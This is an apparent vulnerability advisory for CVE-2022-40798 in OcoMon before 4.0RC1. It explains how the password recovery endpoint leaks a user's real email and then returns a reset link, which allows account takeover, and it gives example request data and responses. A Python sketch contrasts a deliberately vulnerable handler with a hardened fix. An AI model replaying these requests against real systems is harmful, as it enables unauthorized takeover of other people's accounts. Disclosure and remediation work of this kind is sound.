OcoMon < 4.0RC1 - Account Takeover [CVE-2022-40798]
Description
Through the password recovery flow it is possible to obtain a token that resets the password of any user.
Bug - 1
The vulnerability occurs because the application checks the submitted email against the database and, on mismatch, returns the user's real email address in the response.
Bug - 2
If the username and email are both valid, the application returns the password reset link to the user in the response instead of only sending it by email.
PoC
- Access "Esqueci minha senha" ("Forgot my password"):
- Enter a valid username (example: admin) and a fake email.
- The user's real email is exposed in the response:
- Send the request again, replacing the fake email with the user's real email:
- The response contains the link to change the user's password; open it and set a new password:
Examples:
URL: https://ocomon.site/includes/common/require_access_recovery_process.php
DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&email=anything@email.com&action=require_recovery
RESPONSE: "action":"require_recovery","field_id":"email","login_name":"admin","email":"anything@email.com","user_id":"1","name":"Administrador do Sistema","mail_to":"realemail@email.com"}
URL: https://ocomon.site/includes/common/require_access_recovery_process.php
DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&email=realemail@email.com&action=require_recovery
RESPONSE: "action":"require_recovery","field_id":"","login_name":"admin","email":"realemail@email.com","user_id":"1","name":"Administrador do Sistema","mail_to":"realemail@email.com","rand":"b39abfbd697e566d178e678462b0b6c1","forget_link":"https:\/\/ocomon.site\/setNewPass.php?code=1|b39abfbd697e566d178e678462b0b6c1"}
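The two response shapes above, side by side with a corrected handler, as an added illustration that is not OcoMon's own code: a Python stand-in for the PHP endpoint, with a constructed user table, a placeholder host, and an in-memory outbox standing in for the mail transport. The hardened version answers identically whether or not the username/email pair matches, delivers the link only to the address on file, stores only a hash of the token, and consumes the token on first use.

```python
import hashlib
import hmac
import secrets
from typing import Dict, List, Optional, Tuple

# Constructed sample data (OcoMon keeps this in its database); host is a placeholder.
USERS = {"admin": {"user_id": 1, "mail_to": "realemail@email.com"}}
RESET_URL = "https://ocomon.example/setNewPass.php?code="
RESET_TOKENS: Dict[int, str] = {}          # user_id -> sha256(token), server-side only
OUTBOX: List[Tuple[str, str]] = []         # stand-in for the mail transport

def recover_vulnerable(login_name: str, email: str) -> dict:
    """Response shape reported in the advisory (for contrast, do not deploy)."""
    user = USERS.get(login_name)
    if user is None:
        return {"action": "require_recovery", "field_id": "login_name"}
    if email != user["mail_to"]:
        # Bug 1: the real address is echoed back when the submitted one is wrong.
        return {"action": "require_recovery", "field_id": "email", "mail_to": user["mail_to"]}
    rand = secrets.token_hex(16)
    # Bug 2: the reset link is returned to the caller instead of only being emailed.
    return {"action": "require_recovery", "field_id": "",
            "forget_link": f"{RESET_URL}{user['user_id']}|{rand}"}

def recover_hardened(login_name: str, email: str) -> dict:
    """Same endpoint, fixed: uniform response, link only to the address on file."""
    generic = {"action": "require_recovery",
               "message": "If the account exists, a reset link has been emailed."}
    user = USERS.get(login_name)
    if user is None or not hmac.compare_digest(email.encode(), user["mail_to"].encode()):
        return generic                      # no hint about which field was wrong
    rand = secrets.token_hex(16)            # 128-bit CSPRNG token
    RESET_TOKENS[user["user_id"]] = hashlib.sha256(rand.encode()).hexdigest()
    OUTBOX.append((user["mail_to"], f"{RESET_URL}{user['user_id']}|{rand}"))
    return generic                          # the link never appears in the HTTP response

def verify_reset_code(code: str) -> Optional[int]:
    """Validate '<user_id>|<token>' from the emailed link; tokens are single use."""
    try:
        uid_s, rand = code.split("|", 1)
        uid = int(uid_s)
    except ValueError:
        return None
    expected = RESET_TOKENS.get(uid)
    digest = hashlib.sha256(rand.encode()).hexdigest()
    if expected is None or not hmac.compare_digest(digest, expected):
        return None
    del RESET_TOKENS[uid]                   # consume so the link cannot be replayed
    return uid
```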